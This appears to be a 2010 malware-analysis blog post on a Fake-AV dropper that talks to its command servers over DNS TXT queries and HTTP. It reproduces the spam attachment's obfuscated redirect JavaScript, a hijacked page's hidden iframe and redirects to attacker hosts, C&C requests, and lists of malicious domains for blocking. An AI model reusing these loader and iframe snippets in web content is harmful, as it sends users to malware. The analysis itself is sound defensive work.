Tag Archive for 'x.html'

New Dropper Uses DNS To Communicate

During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).

I’ve first seen the Trojan on 2010-06-08 being dropped by a well known Exploit Kit called NeoSploit. The AV detection rate is pretty good: most of the AV-vendors are currently detecting the binaries which are used to spread the Trojan as Fake-AV. As fare as what I have seen is that this Trojan is just a dropper which drops additional Fake-AV software.

Back in june when I first saw the Trojan I’ve added a signature to AMaDa. Hence AMaDa will tag the binaries and URLs which are associated with this Trojan as DNSTrojan.

In September 2010, I just saw a peak on AMaDa in new URLs propagating DNSTrojan:

Over the past days I’ve saw dozends domain names popping up which are being used to spread the Trojan (using Drive-By exploits). Here are some of them:

hezhett.co.cc
hezhexh.co.cc
hezhlhe.co.cc
hezhthu.co.cc
hezlhez.co.cc
hezlhhh.co.cc
hhehshe.co.cc
hheuhhh.co.cc
hhezhez.co.cc
hutahhe.co.cc
hzthezh.co.cc
scaner-ap.cz.cc
scaner-as.cz.cc
scaner-anti.cz.cc
scaner-all.cz.cc
scaner-add.cz.cc
scaner-ac2.cz.cc
scaner-access.cz.cc
scaner-acea.cz.cc
scaner-aced.cz.cc
scaner-acef.cz.cc
scaner-acer.cz.cc
scaner-dual.cz.cc
scaner-fast.cz.cc
scaner-g.cz.cc
scaner-gammi.cz.cc
scaner-go.cz.cc
scaner-h.cz.cc
scaner-hello.cz.cc
scaner-high.cz.cc
scaner-i.cz.cc
scaner-idea.cz.cc
scaner-internet.cz.cc
scaner-ip.cz.cc

As already mentioned before, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:

desktopsecurity2010soft.com
desktopsecuritycorp.com
desktopsecurityorg.com
desktopsecuritysoft2010.com
desktopsecuritysolution.com
desktopsecuritytech2010.com
securitysoftware2010tech.com
securitysoftwaretech2010ltd.com

*** Spam Mails propagating the DNSTrojan ***

This week I’ve found dozens of Spam mails in my honey pots which have had a HTML file attached. Some of the subject I’ve seen so far are:

  • Consultation Appointment
  • Questions
  • Outstanding invoice – 9386 Ltd
  • Nivea commercial payment
  • Appraisal – Killington $155000
  • Re: GO HOME + SHE SAID / 4.3.2.1./
  • Transaction Breakdown
  • Offer on Killington
  • Fwd: Addendum to extend close of escrow!
  • Signatures to Intercreditor
  • demands for payment
  • Mortgage Breakdown PITI
  • notes from last week
  • and many more…

The HTML files which are attached to all those spam mails contains JavaScript code:

<script type='text/javascript'>
<!--
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) {    if(s.charCodeAt(i) == 28){      m+= '&';}
 else if (s.charCodeAt(i) == 23) {      m+= '!';} else {      m+=String.fromCharCode(s.charCodeAt(i)-1);
}}document.write(m);//-->
</script>

Hum? Obfuscated JavaScript code. If we decode it the following HTML code appears:

<meta http-equiv="refresh" content="0;url=http://blacklefilm.com/x.html" />

The JavaScript coded embedded in the malicious attachment are redirecting the victim to a hijacked website which displays the following message in the web browser:

For now I’ve seen the following hijacked websites involved in this spam campaign:

blacklefilm.com/x.html
chautoy.co.za/x.html
numerouno-india.com/x.html
universelles.com/x.html
gvperkins.com/x.html
nobletree.org/x.html
turksagliksen.org.tr/x.html
acquaintive.in/x.html
hesswoodrecycling.com/x.html
equus-ing.com.ar/x.html
barrhavenbia.ca/x.html
annechristene.com/x.html
www.mindconnect.nl/x.html
meltemtvreklam.com/x.html
cernoma.com/x.html
chautoy.co.za/x.html
firstchurchofgodkokomo.org/x.htm
euroiris.cz/x.html

The hijacked website tries to do two things:

  1. Install the ZeuS Banking Trojan using drive-By exploits (See AMaDa)
  2. Redirect the victim once again to site which is controlled by the cybercriminals to distribute DNSTrojan

The HTML source code of the hijacked websites (x.html) looks like this:

<meta http-equiv="refresh" content="4;url=http://lausakizse.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="http://wedubud.co.cc/ajax/?db=img&showtopic=11ss&last=redirect& [...]"></iframe>

Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to assure the victim that his computer is infected with malware and offers him a malicious EXE-file:

The binary served by those websites contains the DNSTrojan and is being detected as “Fake-AV” by the most AV-vendors:

Filename: antivirus.exe
File size : 169984 bytes
MD5 : a00b75b0d43702d4b099548b90c715c7
SHA1 : 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33 /43 (76.7%)

As of 2010-09-21 19:00 UTC, the spam campaign is still going on.

*** The DNSTrojan ***
Let take a closer look at the Trojan which is being dropped: The Trojan installs itself into the following directories:

c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c.\program files\common files\microsoft shared\TextConv\quillmsconv97.exe

Note that the file names used by the Trojan varies. Additionally the Trojan has a interesting behavior when Apple Quick Time is installed on the victims computer: He will install itself into the Quick Time directory:

c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe
c:\program files\apple software updatesoftwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c.\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe

In a next step the Trojan contacts its first Command&Control Server which is located at httpdsconfig.com. But the interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in the first stage:

Standard query TXT 1284891734.httpdsconfig.com
Standard query response TXT

The Trojan is doing a DNS TXT query to httpdconfig.com every few minutes by using the current UNIX timestamp as subdomain (*unixtimestamp*.httpdsconfig.com).The C&C server replies with a encrypted string (seems to be always the same):

$ dig 1284215737.httpdsconfig.com TXT +short
“a0dfe9b34e6c3bc167fc890a20dc283ab8c397eed489f2f737
efceb0064fbba77dc71472b59dde25a2f6f1883ffdc3b1f5ec9
1caf610f02c3b85e8cb831f81e554a83706c8849dd4cfa9ef0c
205c87f5e93f7a5323e71e35d566fe9fc8916717f69304″

Afterwards the Trojan resolves the domain name desktopsecuritysolutionnew.com and will contact a second C&C server located at httpsxy.in. This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: httpsxy.in

The C&C server will answer with a HTTP 404 (Not found) but the response also contains encrypted data anyway. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

*encrypted-data*

Last but not least the Trojan query a third C&C server located at httpsbee.in every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: httpsbee.in

Note that the p string is a base64 encrypted string containing the values “MACHINE”, “OP” and “TRK”.

*** Conclusion ***

  • The Trojan is pretty new (first see in June 2010)
  • The detection rate on the Trojan binaries is currently pretty good
  • The Trojan uses DNS and HTTP to communicate with the C&C
  • The Trojan dropps Fake-AV software (using “getfile.php”)

I recommend you to block the access to the following domain names which are associated with DNSTrojan:

httpdsconfig.com (204.12.223.190 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsbee.in (204.12.223.186 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsxy.in (69.197.147.188 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpssite.in -



economics-recluse
Scene
Urgent!